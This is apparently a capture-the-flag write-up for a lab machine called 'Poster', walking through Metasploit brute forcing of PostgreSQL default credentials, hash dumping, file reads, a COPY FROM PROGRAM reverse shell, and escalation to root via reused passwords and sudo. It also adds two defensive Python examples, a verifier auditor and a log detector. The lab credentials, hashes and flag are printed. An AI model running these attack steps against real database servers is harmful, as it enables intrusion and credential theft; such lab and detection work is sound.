Poster
The sysadmin set up an RDBMS in a safe way.
tag: rdbms, sql, enumeration, metasploit
Task 1: Flag
What is an RDBMS?
Based on E. F. Codd's relational model, an RDBMS lets users create, update, manage, and interact with a relational database, which stores data as tables.
Today, many companies use relational databases rather than flat files or hierarchical databases to store business data, because a relational database can handle a wide range of data formats and processes queries efficiently. It organizes data into tables that can be linked to one another through shared fields, so a user can retrieve data from one or more tables with a single query. A flat file, by contrast, stores data in a single table structure, which is less efficient and consumes more space and memory.
Most commercially available RDBMSs use Structured Query Language (SQL) to access the database. RDBMSs are most commonly used to perform CRUD operations (create, read, update, and delete), which are fundamental to consistent data management.
Target IP Address : 10.10.205.125
Kali Linux : 10.18.72.222
┌──(root㉿kali)-[~/Downloads]
└─# nmap 10.10.205.125
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-13 22:45 EDT
Nmap scan report for 10.10.205.125
Host is up (0.26s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
5432/tcp open postgresql
Nmap done: 1 IP address (1 host up) scanned in 26.28 seconds
┌──(root㉿kali)-[~/Downloads]
└─# nmap -sCV -p 22,80,5432 10.10.205.125
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-13 22:50 EDT
Nmap scan report for 10.10.205.125
Host is up (0.30s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 71:ed:48:af:29:9e:30:c1:b6:1d:ff:b0:24:cc:6d:cb (RSA)
| 256 eb:3a:a3:4e:6f:10:00:ab:ef:fc:c5:2b:0e:db:40:57 (ECDSA)
|_ 256 3e:41:42:35:38:05:d3:92:eb:49:39:c6:e3:ee:78:de (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Poster CMS
|_http-server-header: Apache/2.4.18 (Ubuntu)
5432/tcp open postgresql PostgreSQL DB 9.5.8 - 9.5.10 or 9.5.17 - 9.5.23
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=ubuntu
| Not valid before: 2020-07-29T00:54:25
|_Not valid after: 2030-07-27T00:54:25
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.65 seconds
Visit: http://10.10.205.125/
Name: PostgreSQL Login Utility
Module: auxiliary/scanner/postgres/postgres_login
List of CVEs: CVE-1999-0502
This module attempts to authenticate against a PostgreSQL instance using username and password combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options. Note that passwords may be either plaintext or MD5 formatted hashes.
┌──(root㉿kali)-[~/Downloads]
└─# msfconsole -q
[*] Starting persistent handler(s)...
msf6 > use auxiliary/scanner/postgres/postgres_login
msf6 auxiliary(scanner/postgres/postgres_login) > show options
Module options (auxiliary/scanner/postgres/postgres_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DATABASE template1 yes The database to authenticate against
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
DB_SKIP_EXISTING none no Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
PASSWORD no A specific password to authenticate with
PASS_FILE /usr/share/metasploit-framework/data/wordlists/postgres_default_pass.txt no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RETURN_ROWSET true no Set to true to see query result sets
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 5432 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME no A specific username to authenticate as
USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/postgres_default_userpass.txt no File containing (space-separated) users and passwords, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE /usr/share/metasploit-framework/data/wordlists/postgres_default_user.txt no File containing users, one per line
VERBOSE true yes Whether to print output for all attempts
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/postgres/postgres_login) > setg RHOSTS 10.10.205.125
RHOSTS => 10.10.205.125
msf6 auxiliary(scanner/postgres/postgres_login) > set VERBOSE false
VERBOSE => false
msf6 auxiliary(scanner/postgres/postgres_login) > run
[+] 10.10.205.125:5432 - Login Successful: postgres:password@template1
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Valid login credentials found: postgres:password
PostgreSQL Server Generic Query
This module will allow for simple SQL statements to be executed against a PostgreSQL instance given the appropriate credentials.
msf6 auxiliary(scanner/postgres/postgres_login) > use auxiliary/admin/postgres/postgres_sql
msf6 auxiliary(admin/postgres/postgres_sql) > show options
Module options (auxiliary/admin/postgres/postgres_sql):
Name Current Setting Required Description
---- --------------- -------- -----------
DATABASE template1 yes The database to authenticate against
PASSWORD postgres no The password for the specified username. Leave blank for a random password.
RETURN_ROWSET true no Set to true to see query result sets
RHOSTS 10.10.205.125 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 5432 yes The target port
SQL select version() no The SQL query to execute
USERNAME postgres yes The username to authenticate as
VERBOSE false no Enable verbose output
View the full module info with the info, or info -d command.
msf6 auxiliary(admin/postgres/postgres_sql) > set PASSWORD password
PASSWORD => password
msf6 auxiliary(admin/postgres/postgres_sql) > run
[*] Running module against 10.10.205.125
Query Text: 'select version()'
==============================
version
-------
PostgreSQL 9.5.21 on x86_64-pc-linux-gnu, compiled by gcc (Ubuntu 5.4.0-6ubuntu1~16.04.12) 5.4.0 20160609, 64-bit
[*] Auxiliary module execution completed
Postgres Password Hashdump
This module extracts the usernames and encrypted password hashes from a Postgres server and stores them for later cracking.
msf6 auxiliary(admin/postgres/postgres_sql) > use auxiliary/scanner/postgres/postgres_hashdump
msf6 auxiliary(scanner/postgres/postgres_hashdump) > show options
Module options (auxiliary/scanner/postgres/postgres_hashdump):
Name Current Setting Required Description
---- --------------- -------- -----------
DATABASE postgres yes The database to authenticate against
PASSWORD postgres no The password for the specified username. Leave blank for a random password.
RHOSTS 10.10.205.125 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 5432 yes The target port
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME postgres yes The username to authenticate as
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/postgres/postgres_hashdump) > set PASSWORD password
PASSWORD => password
msf6 auxiliary(scanner/postgres/postgres_hashdump) > run
[+] Query appears to have run successfully
[+] Postgres Server Hashes
======================
Username Hash
-------- ----
darkstart md58842b99375db43e9fdf238753623a27d
poster md578fb805c7412ae597b399844a54cce0a
postgres md532e12f215ba27cb750c9e093ce4b5127
sistemas md5f7dbc0d5a06653e74da6b1af9290ee2b
ti md57af9ac4c593e9e4f275576e13f935579
tryhackme md503aab1165001c8f8ccae31a8824efddc
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
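As an added example (not from the original writeup or from Metasploit), the following Python snippet shows what the dumped "md5..." strings are and audits a role list for them: PostgreSQL's legacy md5 verifier is "md5" followed by hex(md5(password || username)), so the role name is the only salt, the value is deterministic across servers, and the md5 auth method accepts the stored string itself, which is why a hash dump matters. SCRAM-SHA-256 (PostgreSQL 10 and later) uses a random per-role salt and replaces it. The role rows are the six returned above; the SCRAM value is constructed for illustration.

```python
import hashlib
import re

# Shapes of the verifiers PostgreSQL stores in pg_authid.rolpassword.
MD5_RE = re.compile(r"^md5[0-9a-f]{32}$")
SCRAM_RE = re.compile(
    r"^SCRAM-SHA-256\$\d+:[A-Za-z0-9+/=]+\$[A-Za-z0-9+/=]+:[A-Za-z0-9+/=]+$"
)

# The six rows returned by postgres_hashdump above: (role name, stored verifier).
HASHDUMP_ROWS = [
    ("darkstart", "md58842b99375db43e9fdf238753623a27d"),
    ("poster", "md578fb805c7412ae597b399844a54cce0a"),
    ("postgres", "md532e12f215ba27cb750c9e093ce4b5127"),
    ("sistemas", "md5f7dbc0d5a06653e74da6b1af9290ee2b"),
    ("ti", "md57af9ac4c593e9e4f275576e13f935579"),
    ("tryhackme", "md503aab1165001c8f8ccae31a8824efddc"),
]

# Constructed SCRAM-SHA-256 verifier (iterations:salt$StoredKey:ServerKey), not a real one.
SCRAM_EXAMPLE = "SCRAM-SHA-256$4096:c2FsdA==$c3RvcmVk:c2VydmVy"


def pg_md5_verifier(password: str, username: str) -> str:
    """Legacy PostgreSQL md5 verifier: 'md5' + hex(md5(password || username)).
    The role name is the only salt, so the same password for the same role name
    yields the same verifier on every server."""
    return "md5" + hashlib.md5((password + username).encode("utf-8")).hexdigest()


def classify_verifier(verifier) -> str:
    """Name the storage format of one rolpassword value."""
    if not verifier:
        return "none"  # no password set (NOLOGIN role, or cert/peer auth only)
    if MD5_RE.match(verifier):
        return "md5"
    if SCRAM_RE.match(verifier):
        return "scram-sha-256"
    return "plaintext"  # servers before PostgreSQL 10 could store the raw password


def weak_roles(rows):
    """Roles whose stored verifier is replayable (md5) or directly readable (plaintext)."""
    classified = ((name, classify_verifier(v)) for name, v in rows)
    return [(name, kind) for name, kind in classified if kind in ("md5", "plaintext")]


if __name__ == "__main__":
    for name, kind in weak_roles(HASHDUMP_ROWS):
        print(f"{name}: {kind} verifier; set password_encryption = 'scram-sha-256' and rotate")
    print("constructed SCRAM value classified as:", classify_verifier(SCRAM_EXAMPLE))
```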
postgres_readfile
The postgres_readfile module, when provided with valid credentials for a PostgreSQL server, will read and display files of your choosing on the server.
msf6 auxiliary(scanner/postgres/postgres_hashdump) > use auxiliary/admin/postgres/postgres_readfile
msf6 auxiliary(admin/postgres/postgres_readfile) > show options
Module options (auxiliary/admin/postgres/postgres_readfile):
Name Current Setting Required Description
---- --------------- -------- -----------
DATABASE template1 yes The database to authenticate against
PASSWORD postgres no The password for the specified username. Leave blank for a random password.
RFILE /etc/passwd yes The remote file
RHOSTS 10.10.205.125 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 5432 yes The target port
USERNAME postgres yes The username to authenticate as
VERBOSE false no Enable verbose output
View the full module info with the info, or info -d command.
msf6 auxiliary(admin/postgres/postgres_readfile) > set PASSWORD password
PASSWORD => password
msf6 auxiliary(admin/postgres/postgres_readfile) > run
[*] Running module against 10.10.205.125
Query Text: 'CREATE TEMP TABLE lsZDgg (INPUT TEXT);
COPY lsZDgg FROM '/etc/passwd';
SELECT * FROM lsZDgg'
=====================================================================================================================
input
-----
#/home/dark/credentials.txt
_apt:x:105:65534::/nonexistent:/bin/false
alison:x:1000:1000:Poster,,,:/home/alison:/bin/bash
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
dark:x:1001:1001::/home/dark:
games:x:5:60:games:/usr/games:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
messagebus:x:106:110::/var/run/dbus:/bin/false
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
postgres:x:109:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
root:x:0:0:root:/root:/bin/bash
sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
sys:x:3:3:sys:/dev:/usr/sbin/nologin
syslog:x:104:108::/home/syslog:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
uuidd:x:107:111::/run/uuidd:/bin/false
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
#/home/dark/credentials.txt
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
alison:x:1000:1000:Poster,,,:/home/alison:/bin/bash
sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin
postgres:x:109:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
dark:x:1001:1001::/home/dark:
[+] 10.10.205.125:5432 Postgres - /etc/passwd saved in /root/.msf4/loot/20230813235707_default_10.10.205.125_postgres.file_263247.txt
[*] Auxiliary module execution completed
Users on the target: root, alison, dark.
PostgreSQL COPY FROM PROGRAM Command Execution
Installations running Postgres 9.3 and above have functionality which allows the superuser and users with 'pg_execute_server_program' to pipe to and from an external program using COPY. This allows arbitrary command execution as though you have console access. This module attempts to create a new table, then execute system commands in the context of copying the command output into the table. This module should work on all Postgres systems running version 9.3 and above. For Linux and OSX systems, target 1 is used with cmd payloads such as cmd/unix/reverse_perl. For Windows systems, target 2 is used with PowerShell payloads such as cmd/windows/powershell_reverse_tcp. Alternatively, target 3 can be used to execute generic commands, such as a web_delivery Meterpreter PowerShell payload or another customised command.
msf6 auxiliary(admin/postgres/postgres_readfile) > use exploit/multi/postgres/postgres_copy_from_program_cmd_exec
[*] Using configured payload cmd/unix/reverse_perl
msf6 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > show options
Module options (exploit/multi/postgres/postgres_copy_from_program_cmd_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
DATABASE template1 yes The database to authenticate against
DUMP_TABLE_OUTPUT false no select payload command output from table (For Debugging)
PASSWORD postgres no The password for the specified username. Leave blank for a random password.
RHOSTS 10.10.205.125 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 5432 yes The target port (TCP)
TABLENAME fNUOAAmXC yes A table name that does not exist (To avoid deletion)
USERNAME postgres yes The username to authenticate as
Payload options (cmd/unix/reverse_perl):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set PASSWORD password
PASSWORD => password
msf6 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set LHOST 10.18.72.222
LHOST => 10.18.72.222
msf6 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > run
[*] Started reverse TCP handler on 10.18.72.222:4444
[*] 10.10.205.125:5432 - 10.10.205.125:5432 - PostgreSQL 9.5.21 on x86_64-pc-linux-gnu, compiled by gcc (Ubuntu 5.4.0-6ubuntu1~16.04.12) 5.4.0 20160609, 64-bit
[*] 10.10.205.125:5432 - Exploiting...
[+] 10.10.205.125:5432 - 10.10.205.125:5432 - fNUOAAmXC dropped successfully
[+] 10.10.205.125:5432 - 10.10.205.125:5432 - fNUOAAmXC created successfully
[+] 10.10.205.125:5432 - 10.10.205.125:5432 - fNUOAAmXC copied successfully(valid syntax/command)
[+] 10.10.205.125:5432 - 10.10.205.125:5432 - fNUOAAmXC dropped successfully(Cleaned)
[*] 10.10.205.125:5432 - Exploit Succeeded
[*] Command shell session 1 opened (10.18.72.222:4444 -> 10.10.205.125:48962) at 2023-08-14 00:11:21 -0400
python3 -c 'import pty; pty.spawn("/bin/bash")'
postgres@ubuntu:/var/lib/postgresql/9.5/main$ whoami
whoami
postgres
postgres@ubuntu:/var/lib/postgresql/9.5/main$ id
id
uid=109(postgres) gid=117(postgres) groups=117(postgres),116(ssl-cert)
postgres@ubuntu:/var/lib/postgresql/9.5/main$ cd /home
cd /home
postgres@ubuntu:/home$ ls -al
ls -al
total 16
drwxr-xr-x 4 root root 4096 Jul 28 2020 .
drwxr-xr-x 22 root root 4096 Jul 28 2020 ..
drwxr-xr-x 4 alison alison 4096 Jul 28 2020 alison
drwxr-xr-x 2 dark dark 4096 Jul 28 2020 dark
postgres@ubuntu:/home$ cd alison
cd alison
postgres@ubuntu:/home/alison$ ls -al
ls -al
total 40
drwxr-xr-x 4 alison alison 4096 Jul 28 2020 .
drwxr-xr-x 4 root root 4096 Jul 28 2020 ..
-rw------- 1 alison alison 2444 Jul 28 2020 .bash_history
-rw-r--r-- 1 alison alison 220 Jul 28 2020 .bash_logout
-rw-r--r-- 1 alison alison 3771 Jul 28 2020 .bashrc
drwx------ 2 alison alison 4096 Jul 28 2020 .cache
drwxr-xr-x 2 alison alison 4096 Jul 28 2020 .nano
-rw-r--r-- 1 alison alison 655 Jul 28 2020 .profile
-rw-r--r-- 1 alison alison 0 Jul 28 2020 .sudo_as_admin_successful
-rw------- 1 alison alison 35 Jul 28 2020 user.txt
-rw-r--r-- 1 root root 183 Jul 28 2020 .wget-hsts
postgres@ubuntu:/home/alison$ cat user.txt
cat user.txt
cat: user.txt: Permission denied
postgres@ubuntu:/home/alison$ cd ../dark
cd ../dark
postgres@ubuntu:/home/dark$ ls -al
ls -al
total 28
drwxr-xr-x 2 dark dark 4096 Jul 28 2020 .
drwxr-xr-x 4 root root 4096 Jul 28 2020 ..
-rw------- 1 dark dark 26 Jul 28 2020 .bash_history
-rw-r--r-- 1 dark dark 220 Aug 31 2015 .bash_logout
-rw-r--r-- 1 dark dark 3771 Aug 31 2015 .bashrc
-rwxrwxrwx 1 dark dark 24 Jul 28 2020 credentials.txt
-rw-r--r-- 1 dark dark 655 May 16 2017 .profile
postgres@ubuntu:/home/dark$ cat credentials.txt
cat credentials.txt
dark:qwerty1234#!hackme
User credentials found: dark:qwerty1234#!hackme
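From the defender's side, both postgres_readfile and postgres_copy_from_program_cmd_exec leave a recognisable trace in the server log: a COPY whose source is a server-side file path or a PROGRAM clause, issued over a remote superuser session. The following Python detector is an added example, not part of the original writeup; it runs over constructed log lines and assumes log_line_prefix = '%m [%p] %u@%d %r ' with log_statement = 'all' and log_connections = on (the command after PROGRAM is deliberately redacted).

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed PostgreSQL server log excerpt for this example (not from the target).
# Prefix fields: timestamp, [pid], user@database, client address, then the message.
# COPY ... FROM STDIN is included as a benign case that must not be flagged.
SAMPLE_LOG = """\
2023-08-13 22:55:01.123 EDT [2231] postgres@template1 10.18.72.222(51622) LOG:  connection authorized: user=postgres database=template1
2023-08-13 22:55:02.001 EDT [2231] postgres@template1 10.18.72.222(51622) LOG:  statement: select version()
2023-08-13 23:57:05.870 EDT [2240] postgres@template1 10.18.72.222(51700) LOG:  statement: CREATE TEMP TABLE lsZDgg (INPUT TEXT); COPY lsZDgg FROM '/etc/passwd'; SELECT * FROM lsZDgg
2023-08-14 00:11:20.500 EDT [2251] postgres@template1 10.18.72.222(51744) LOG:  statement: CREATE TABLE fNUOAAmXC(c text); COPY fNUOAAmXC FROM PROGRAM 'REDACTED'; DROP TABLE fNUOAAmXC
2023-08-14 00:12:00.000 EDT [2260] poster@poster [local] LOG:  statement: COPY posts TO '/tmp/posts.csv'
2023-08-14 00:13:00.000 EDT [2261] poster@poster 127.0.0.1(40000) LOG:  statement: COPY posts FROM STDIN
2023-08-14 00:14:00.000 EDT [2262] poster@poster 127.0.0.1(40001) LOG:  statement: SELECT * FROM posts WHERE id = 1
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+ \S+) \[(?P<pid>\d+)\] (?P<user>[^@\s]+)@(?P<db>\S+) "
    r"(?P<client>\S+) (?P<level>[A-Z]+):\s+(?P<msg>.*)$"
)
# COPY <table|(query)> FROM|TO { 'file' | PROGRAM 'command' | STDIN | STDOUT }
COPY_RE = re.compile(
    r"\bCOPY\b.*?\b(?P<dir>FROM|TO)\s+(?P<prog>PROGRAM\s+)?(?P<src>'[^']*'|STDIN|STDOUT)",
    re.IGNORECASE,
)
LOCAL_CLIENTS = ("[local]", "127.0.0.1", "::1")


@dataclass
class Finding:
    severity: str
    rule: str
    user: str
    client: str
    detail: str


def analyze(log_text: str, superusers: tuple[str, ...] = ("postgres",)) -> list[Finding]:
    """Flag server-side COPY abuse and remote superuser logins in one pass over the log."""
    findings: list[Finding] = []
    for raw in log_text.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue  # not a line in the expected prefix format
        user, client, msg = m["user"], m["client"], m["msg"]
        if (msg.startswith("connection authorized") and user in superusers
                and not client.startswith(LOCAL_CLIENTS)):
            findings.append(Finding("medium", "superuser_remote_login", user, client, msg))
        if not msg.startswith("statement:"):
            continue
        for c in COPY_RE.finditer(msg):
            if c["prog"]:
                # COPY ... FROM PROGRAM runs a shell command as the postgres OS user
                findings.append(Finding("critical", "copy_from_program", user, client, c.group(0)))
            elif c["src"].upper() in ("STDIN", "STDOUT"):
                continue  # data streamed from/to the client: normal application use
            elif c["dir"].upper() == "FROM":
                # server-side file read into a table (the postgres_readfile pattern)
                findings.append(Finding("high", "copy_from_server_file", user, client, c.group(0)))
            else:
                findings.append(Finding("medium", "copy_to_server_file", user, client, c.group(0)))
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f"[{f.severity}] {f.rule} user={f.user} client={f.client} :: {f.detail}")
```

Run against the sample it reports the remote postgres login, the /etc/passwd read, the PROGRAM execution and the file write, and stays silent on the STDIN copy and the plain SELECT.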
The lab was restarted, so the target address changed:
Target IP Address : 10.10.111.29
Kali Linux : 10.18.72.222
Log in to the target over SSH as user dark:
┌──(root㉿kali)-[~/Downloads]
└─# ssh dark@10.10.111.29
The authenticity of host '10.10.111.29 (10.10.111.29)' can't be established.
ED25519 key fingerprint is SHA256:8bd9QsiWgYCCiNEifxZv+F0jblZZnuBhOKgM6saFGCE.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.111.29' (ED25519) to the list of known hosts.
dark@10.10.111.29's password:
Last login: Tue Jul 28 20:27:25 2020 from 192.168.85.142
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
dark@ubuntu:~$ whoami
dark
dark@ubuntu:~$ id
uid=1001(dark) gid=1001(dark) groups=1001(dark)
dark@ubuntu:~$ pwd
/home/dark
dark@ubuntu:~$ ls -al
total 28
drwxr-xr-x 2 dark dark 4096 Jul 28 2020 .
drwxr-xr-x 4 root root 4096 Jul 28 2020 ..
-rw------- 1 dark dark 26 Jul 28 2020 .bash_history
-rw-r--r-- 1 dark dark 220 Aug 31 2015 .bash_logout
-rw-r--r-- 1 dark dark 3771 Aug 31 2015 .bashrc
-rw-r--r-- 1 dark dark 655 May 16 2017 .profile
-rwxrwxrwx 1 dark dark 24 Jul 28 2020 credentials.txt
Upload LinEnum.sh and run it:
[-] It looks like we have some admin users:
uid=104(syslog) gid=108(syslog) groups=108(syslog),4(adm)
uid=1000(alison) gid=1000(alison) groups=1000(alison),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),114(lpadmin),115(sambashare)
[+] It looks like we have password hashes in /etc/passwd!
#/home/dark/credentials.txt
[-] Kernel information:
Linux ubuntu 4.4.0-186-generic #216-Ubuntu SMP Wed Jul 1 05:34:05 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
[-] Kernel information (continued):
Linux version 4.4.0-186-generic (buildd@lcy01-amd64-002) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.12) ) #216-Ubuntu SMP Wed Jul 1 05:34:05 UTC 2020
[-] Specific release information:
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04.6 LTS"
NAME="Ubuntu"
VERSION="16.04.6 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04.6 LTS"
VERSION_ID="16.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
VERSION_CODENAME=xenial
UBUNTU_CODENAME=xenial
[-] Hostname:
ubuntu
Remember that the target runs a web service? A config.php was found under /var/www/html.
dark@ubuntu:/var/www/html$ ls -al
total 16
drwxr-xr-x 3 root root 4096 Jul 28 2020 .
drwxr-xr-x 3 root root 4096 Jul 28 2020 ..
-rwxrwxrwx 1 alison alison 123 Jul 28 2020 config.php
drwxr-xr-x 4 alison alison 4096 Jul 28 2020 poster
This file reveals the password of user alison: p4ssw0rdS3cur3!#
dark@ubuntu:/var/www/html$ cat config.php
<?php
$dbhost = "127.0.0.1";
$dbuname = "alison";
$dbpass = "p4ssw0rdS3cur3!#";
$dbname = "mysudopassword";
?>
Switch to user alison. This user is a member of the sudo group.
dark@ubuntu:/var/www/html$ su - alison
Password:
alison@ubuntu:~$ whoami
alison
alison@ubuntu:~$ id
uid=1000(alison) gid=1000(alison) groups=1000(alison),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),114(lpadmin),115(sambashare)
alison@ubuntu:~$ pwd
/home/alison
alison@ubuntu:~$ ls -al
total 40
drwxr-xr-x 4 alison alison 4096 Jul 28 2020 .
drwxr-xr-x 4 root root 4096 Jul 28 2020 ..
-rw------- 1 alison alison 2444 Jul 28 2020 .bash_history
-rw-r--r-- 1 alison alison 220 Jul 28 2020 .bash_logout
-rw-r--r-- 1 alison alison 3771 Jul 28 2020 .bashrc
drwx------ 2 alison alison 4096 Jul 28 2020 .cache
drwxr-xr-x 2 alison alison 4096 Jul 28 2020 .nano
-rw-r--r-- 1 alison alison 655 Jul 28 2020 .profile
-rw-r--r-- 1 alison alison 0 Jul 28 2020 .sudo_as_admin_successful
-rw------- 1 alison alison 35 Jul 28 2020 user.txt
-rw-r--r-- 1 root root 183 Jul 28 2020 .wget-hsts
alison@ubuntu:~$ cat user.txt
THM{postgresql_fa1l_conf1gurat1on}
su
Switch user
sudo
Run as superuser
If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.
alison@ubuntu:~$ sudo su
[sudo] password for alison:
root@ubuntu:/home/alison# whoami
root
root@ubuntu:/home/alison# id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:/home/alison# cat /etc/shadow
root:!:18471:0:99999:7:::
daemon:*:17953:0:99999:7:::
bin:*:17953:0:99999:7:::
sys:*:17953:0:99999:7:::
sync:*:17953:0:99999:7:::
games:*:17953:0:99999:7:::
man:*:17953:0:99999:7:::
lp:*:17953:0:99999:7:::
mail:*:17953:0:99999:7:::
news:*:17953:0:99999:7:::
uucp:*:17953:0:99999:7:::
proxy:*:17953:0:99999:7:::
www-data:*:17953:0:99999:7:::
backup:*:17953:0:99999:7:::
list:*:17953:0:99999:7:::
irc:*:17953:0:99999:7:::
gnats:*:17953:0:99999:7:::
nobody:*:17953:0:99999:7:::
systemd-timesync:*:17953:0:99999:7:::
systemd-network:*:17953:0:99999:7:::
systemd-resolve:*:17953:0:99999:7:::
systemd-bus-proxy:*:17953:0:99999:7:::
syslog:*:17953:0:99999:7:::
_apt:*:17953:0:99999:7:::
messagebus:*:18471:0:99999:7:::
uuidd:*:18471:0:99999:7:::
alison:$6$w0kXFSdk$UbokwwU0oMyAD6Ar12b5zLfXb1yTDJAUtdAIL7XmnQaRXCvO9dqic6oG5TdVDoGxaL6XjM6uxldZ1MmPI1LIh0:18472:0:99999:7:::
sshd:*:18471:0:99999:7:::
postgres:*:18472:0:99999:7:::
